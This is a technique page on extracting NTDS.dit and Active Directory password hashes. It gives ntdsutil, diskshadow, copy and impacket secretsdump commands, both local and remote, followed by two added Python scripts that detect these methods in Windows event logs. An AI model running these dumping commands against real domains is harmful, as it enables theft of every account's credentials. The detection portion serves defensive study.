Dumping Domain Controller Hashes Locally and Remotely
Dumping NTDS.dit with Active Directory users hashes

No Credentials - ntdsutil

If you have no credentials, but you have access to the DC, it's possible to dump the ntds.dit using the lolbin ntdsutil.exe:

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

We can see that the ntds.dit as well as the SYSTEM and SECURITY registry hives are being dumped to c:\temp.
We can then dump password hashes offline with impacket:

[email protected]~/tools/mitre/ntds# /usr/bin/impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local

No Credentials - diskshadow

On Windows Server 2008+, we can use diskshadow to grab the ntds.dit.
Create a diskshadow script that creates a new shadow copy of the C: drive (where ntds.dit is located in our case) and exposes it as drive Z:\

shadow.txt:

set context persistent nowriters
set metadata c:\exfil\metadata.cab
add volume c: alias trophy
create
expose %trophy% z:

...and now execute the following:

mkdir c:\exfil
diskshadow.exe /s C:\users\Administrator\Desktop\shadow.txt
cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit

Below shows that the ntds.dit got extracted and placed into our c:\exfil folder.
Inside the interactive diskshadow utility, clean up the shadow volume:

diskshadow.exe
> delete shadows volume trophy
> reset
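From the defensive side, both of the credential-less methods above (the ntdsutil IFM snapshot and the diskshadow script) leave a clear trace in process-creation telemetry. The following is an added example, not code from the original page: it runs a few command-line heuristics over constructed Sysmon Event ID 1 / Security 4688 style records. The field names, the sample events, the "BackupVendor" allowlist entry and the rule names are all assumptions made for the demo.

```python
"""Added example (not from the original page): flag NTDS.dit extraction attempts
via ntdsutil IFM snapshots or diskshadow scripts in process-creation telemetry.
Field names follow Sysmon Event ID 1 / Security 4688; events are constructed."""
import re

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Computer": "DC01", "User": "OFFENSE\\Administrator",
     "Image": r"C:\Windows\System32\ntdsutil.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "ntdsutil.exe \"ac i ntds\" \"ifm\" \"create full c:\\temp\" q q"},
    {"Computer": "DC01", "User": "OFFENSE\\Administrator",
     "Image": r"C:\Windows\System32\diskshadow.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"diskshadow.exe /s C:\users\Administrator\Desktop\shadow.txt"},
    {"Computer": "DC01", "User": "OFFENSE\\Administrator",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit"},
    # Hypothetical backup agent that legitimately touches ntds.dit (allowlisted below).
    {"Computer": "DC01", "User": "NT AUTHORITY\\SYSTEM",
     "Image": r"C:\Program Files\BackupVendor\agent.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"agent.exe --vss-snapshot C:\Windows\NTDS\ntds.dit"},
    {"Computer": "WS07", "User": "OFFENSE\\jdoe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe report.txt"},
]

# Hypothetical allowlist of backup software expected to read ntds.dit (lower-case paths).
ALLOWLISTED_IMAGES = {r"c:\program files\backupvendor\agent.exe"}

# Each rule: (name, severity, predicate over lower-cased image basename and command line).
RULES = [
    # ntdsutil "ifm" + "create" produces an Install From Media copy of the database.
    ("ntdsutil_ifm_snapshot", "high",
     lambda img, cl: img == "ntdsutil.exe"
     and re.search(r"\bifm\b", cl) is not None
     and re.search(r"\bcreate\b", cl) is not None),
    # diskshadow driven by a script file (/s) is rare outside scheduled backups.
    ("diskshadow_script_mode", "medium",
     lambda img, cl: img == "diskshadow.exe"
     and re.search(r"(?<!\S)/s\b", cl) is not None),
    # Any process naming ntds.dit on its command line (copy from a shadow copy, etc.).
    ("ntds_dit_in_commandline", "high",
     lambda img, cl: "ntds.dit" in cl),
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the list of (rule, severity) hits for one process-creation event."""
    if event["Image"].lower() in ALLOWLISTED_IMAGES:
        return []
    img = basename(event["Image"])
    cl = event["CommandLine"].lower()
    return [(name, sev) for name, sev, pred in RULES if pred(img, cl)]


def scan(events):
    """Return findings as (Computer, User, rule, severity) tuples, in event order."""
    findings = []
    for ev in events:
        for name, sev in evaluate(ev):
            findings.append((ev["Computer"], ev["User"], name, sev))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print("%-5s %-22s %-26s %s" % f)
```

Against the constructed events the scan reports three findings, all on DC01: the IFM snapshot, the scripted diskshadow run, and the copy of ntds.dit out of the exposed shadow volume; the allowlisted backup agent and the workstation noise are ignored. The diskshadow rule is deliberately only "medium", since the process event does not reveal what the script does, so it should be tuned against known backup jobs rather than alerted on blindly.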

With Credentials

If you have credentials for an account that can log on to the DC, it's possible to dump hashes from NTDS.dit remotely via RPC with impacket:

impacket-secretsdump -just-dc-ntlm offense/[email protected]
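The remote variant above does not touch the file at all: secretsdump's -just-dc mode asks the DC to replicate the password attributes to it, the same DCSync-style request a domain controller makes. On the DC this surfaces as Security Event ID 4662 carrying the replication extended rights (when the Directory Service Access audit subcategory is enabled and the domain object's SACL audits Control Access). The following is an added example, not code from the original page: it flags such 4662 records for accounts that are not domain controllers. The sample events, the "svc-dirsync" allowlist entry and the placeholder GUID in the last event are constructed assumptions; the three replication-right GUIDs and the 0x100 Control Access mask are the documented Active Directory values.

```python
"""Added example (not from the original page): flag replication-based hash
dumping (secretsdump -just-dc / -just-dc-ntlm, DCSync) in Security 4662 records.
The events are constructed for this demo."""
import re

# Extended rights needed to pull password data through replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # AccessMask bit set when an extended right is exercised

# Hypothetical allowlist of service accounts expected to replicate (directory sync etc.).
ALLOWLISTED_ACCOUNTS = {"svc-dirsync"}

GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.I)

# Constructed 4662 samples; Properties mirrors the multi-line text of the real field.
DOMAIN_DNS = "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"  # domainDNS object class GUID
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "administrator", "SubjectDomainName": "OFFENSE",
     "ObjectType": DOMAIN_DNS, "ObjectName": "DC=offense,DC=local", "AccessMask": "0x100",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t" + DOMAIN_DNS},
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "OFFENSE",
     "ObjectType": DOMAIN_DNS, "ObjectName": "DC=offense,DC=local", "AccessMask": "0x100",
     "Properties": "Control Access\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t" + DOMAIN_DNS},
    {"EventID": 4662, "SubjectUserName": "svc-dirsync", "SubjectDomainName": "OFFENSE",
     "ObjectType": DOMAIN_DNS, "ObjectName": "DC=offense,DC=local", "AccessMask": "0x100",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t" + DOMAIN_DNS},
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "OFFENSE",
     "ObjectType": DOMAIN_DNS, "ObjectName": "DC=offense,DC=local", "AccessMask": "0x20",
     "Properties": "Write Property\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t" + DOMAIN_DNS},
    # Some other extended right; the GUID below is a constructed placeholder.
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "OFFENSE",
     "ObjectType": DOMAIN_DNS, "ObjectName": "DC=offense,DC=local", "AccessMask": "0x100",
     "Properties": "Control Access\n\t{11111111-2222-3333-4444-555555555555}\n\t" + DOMAIN_DNS},
]


def replication_rights_used(event):
    """Names of replication rights exercised in this event (empty if none)."""
    if int(event["AccessMask"], 16) & CONTROL_ACCESS == 0:
        return []  # Control Access bit absent: not an extended-right check
    guids = {g.lower() for g in GUID_RE.findall(event["Properties"])}
    return sorted(REPLICATION_RIGHTS[g] for g in guids & set(REPLICATION_RIGHTS))


def is_expected_replicator(event):
    """Machine accounts (domain controllers) and allowlisted service accounts replicate legitimately."""
    name = event["SubjectUserName"]
    return name.endswith("$") or name in ALLOWLISTED_ACCOUNTS


def detect_dcsync(events):
    """Return (DOMAIN\\user, [rights]) for each 4662 that looks like a DCSync-style read."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights_used(ev)
        if rights and not is_expected_replicator(ev):
            alerts.append((ev["SubjectDomainName"] + "\\" + ev["SubjectUserName"], rights))
    return alerts


if __name__ == "__main__":
    for account, rights in detect_dcsync(SAMPLE_EVENTS):
        print("DCSync-style replication by", account, "using", ", ".join(rights))
```

Only the first record alerts: the user account replicates with both Get-Changes and Get-Changes-All, which is exactly what a -just-dc-ntlm run needs. The DC02$ record is normal inter-DC replication, the sync account is allowlisted, and the two jdoe records lack either the Control Access bit or a replication GUID. The machine-account exclusion is a heuristic; a compromised DC computer account would slip past it, so pair this with the DC inventory rather than trusting the trailing "$" alone.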

References

Attack Methods for Gaining Domain Admin Rights in Active Directory (Active Directory Security)
Tutorial for NTDS goodness (VSSADMIN, WMIS, NTDS.dit, SYSTEM): https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM)/
DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction (bohops)